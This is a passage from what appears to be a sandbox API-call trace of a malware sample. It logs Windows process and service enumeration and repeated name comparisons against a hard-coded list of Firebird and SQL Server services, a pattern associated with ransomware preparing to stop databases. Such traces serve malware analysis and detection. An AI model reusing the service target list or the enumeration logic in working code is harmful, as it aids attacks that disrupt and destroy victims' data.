lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0160.292] lstrlenW (lpString="cmd.exe") returned 7 [0160.292] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0160.292] lstrlenW (lpString="conhost.exe") returned 11 [0160.292] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0160.293] CloseHandle (hObject=0x29c) returned 1 [0160.293] Sleep (dwMilliseconds=0x1f4) [0160.836] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74e8e0 [0160.837] EnumServicesStatusExW (in: hSCManager=0x74e8e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0160.838] GetLastError () returned 0xea [0160.838] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1dfc) returned 0x770490 [0160.838] EnumServicesStatusExW (in: hSCManager=0x74e8e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x770490, cbBufSize=0x1dfc, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x770490, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0160.839] CloseServiceHandle (hSCObject=0x74e8e0) returned 1 [0160.839] lstrlenW (lpString="Appinfo") returned 7 [0160.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0160.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0160.839] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0160.839] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0160.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0160.839] lstrlenW (lpString="AppXSvc") returned 7 [0160.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0160.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0160.840] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0160.840] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0160.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0160.840] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0160.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0160.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0160.840] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0160.840] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0160.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0160.840] lstrlenW (lpString="Audiosrv") returned 8 [0160.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0160.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0160.840] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0160.840] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0160.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0160.840] lstrlenW (lpString="BFE") returned 3 [0160.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0160.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0160.840] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0160.840] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0160.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0160.840] lstrlenW (lpString="BITS") returned 4 [0160.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0160.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0160.840] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0160.840] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0160.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0160.841] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0160.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0160.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0160.841] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0160.841] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0160.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0160.841] lstrlenW (lpString="CDPSvc") returned 6 [0160.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0160.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0160.841] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0160.841] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0160.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0160.841] lstrlenW (lpString="ClickToRunSvc") returned 13 [0160.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0160.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0160.841] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0160.841] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0160.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0160.841] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0160.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0160.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0160.841] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0160.841] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0160.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0160.841] lstrlenW (lpString="CryptSvc") returned 8 [0160.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0160.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0160.841] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0160.842] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0160.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0160.842] lstrlenW (lpString="DcomLaunch") returned 10 [0160.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0160.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0160.842] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0160.842] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0160.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0160.842] lstrlenW (lpString="Dhcp") returned 4 [0160.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0160.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0160.842] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0160.842] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0160.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0160.842] lstrlenW (lpString="Dnscache") returned 8 [0160.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0160.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0160.842] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0160.842] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0160.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0160.842] lstrlenW (lpString="DoSvc") returned 5 [0160.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0160.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0160.842] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0160.842] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0160.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0160.842] lstrlenW (lpString="DPS") returned 3 [0160.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0160.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0160.843] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0160.843] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0160.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0160.843] lstrlenW (lpString="DusmSvc") returned 7 [0160.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0160.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0160.843] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0160.843] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0160.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0160.843] lstrlenW (lpString="EventLog") returned 8 [0160.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0160.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0160.843] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0160.843] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0160.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0160.843] lstrlenW (lpString="EventSystem") returned 11 [0160.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0160.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0160.843] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0160.843] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0160.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0160.843] lstrlenW (lpString="FontCache") returned 9 [0160.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0160.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0160.843] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0160.843] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0160.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0160.843] lstrlenW (lpString="gpsvc") returned 5 [0160.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0160.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0160.844] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0160.844] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0160.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0160.844] lstrlenW (lpString="iphlpsvc") returned 8 [0160.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0160.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0160.844] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0160.844] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0160.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0160.844] lstrlenW (lpString="KeyIso") returned 6 [0160.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0160.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0160.844] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0160.844] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0160.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0160.844] lstrlenW (lpString="LanmanServer") returned 12 [0160.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0160.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0160.844] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0160.844] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0160.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0160.844] lstrlenW (lpString="LanmanWorkstation") returned 17 [0160.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0160.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0160.844] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0160.844] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0160.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0160.845] lstrlenW (lpString="lfsvc") returned 5 [0160.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0160.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0160.845] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0160.845] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0160.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0160.845] lstrlenW (lpString="lmhosts") returned 7 [0160.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0160.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0160.845] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0160.845] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0160.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0160.845] lstrlenW (lpString="LSM") returned 3 [0160.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0160.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0160.845] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0160.845] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0160.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0160.845] lstrlenW (lpString="MpsSvc") returned 6 [0160.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0160.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0160.845] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0160.845] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0160.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0160.845] lstrlenW (lpString="NcbService") returned 10 [0160.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0160.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0160.845] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0160.846] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0160.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0160.846] lstrlenW (lpString="netprofm") returned 8 [0160.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0160.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0160.846] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0160.846] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0160.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0160.846] lstrlenW (lpString="NlaSvc") returned 6 [0160.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0160.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0160.846] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0160.846] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0160.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0160.846] lstrlenW (lpString="nsi") returned 3 [0160.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0160.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0160.846] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0160.846] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0160.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0160.846] lstrlenW (lpString="PcaSvc") returned 6 [0160.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0160.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0160.846] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0160.846] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0160.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0160.846] lstrlenW (lpString="PlugPlay") returned 8 [0160.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0160.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0160.847] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0160.847] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0160.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0160.847] lstrlenW (lpString="Power") returned 5 [0160.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0160.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0160.847] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0160.847] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0160.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0160.847] lstrlenW (lpString="ProfSvc") returned 7 [0160.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0160.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0160.847] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0160.847] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0160.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0160.847] lstrlenW (lpString="RpcEptMapper") returned 12 [0160.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0160.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0160.847] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0160.847] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0160.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0160.847] lstrlenW (lpString="RpcSs") returned 5 [0160.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0160.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0160.847] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0160.847] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0160.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0160.847] lstrlenW (lpString="SamSs") returned 5 [0160.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0160.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0160.848] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0160.848] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0160.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0160.848] lstrlenW (lpString="Schedule") returned 8 [0160.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0160.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0160.848] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0160.848] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0160.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0160.848] lstrlenW (lpString="SecurityHealthService") returned 21 [0160.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0160.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0160.848] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0160.848] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0160.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0160.848] lstrlenW (lpString="SENS") returned 4 [0160.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0160.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0160.848] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0160.848] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0160.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0160.848] lstrlenW (lpString="ShellHWDetection") returned 16 [0160.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0160.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0160.848] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0160.848] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0160.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0160.849] lstrlenW (lpString="Spooler") returned 7 [0160.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0160.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0160.849] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0160.849] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0160.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0160.849] lstrlenW (lpString="sppsvc") returned 6 [0160.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0160.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0160.849] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0160.849] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0160.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0160.849] lstrlenW (lpString="SSDPSRV") returned 7 [0160.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0160.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0160.849] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0160.849] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0160.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0160.849] lstrlenW (lpString="StateRepository") returned 15 [0160.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0160.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0160.849] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0160.849] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0160.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0160.849] lstrlenW (lpString="SysMain") returned 7 [0160.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0160.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0160.849] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0160.850] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0160.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0160.850] lstrlenW (lpString="SystemEventsBroker") returned 18 [0160.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0160.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0160.850] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0160.850] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0160.850] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x770490 | out: hHeap=0x710000) returned 1 [0160.850] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2a0 [0164.565] Process32FirstW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.580] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, 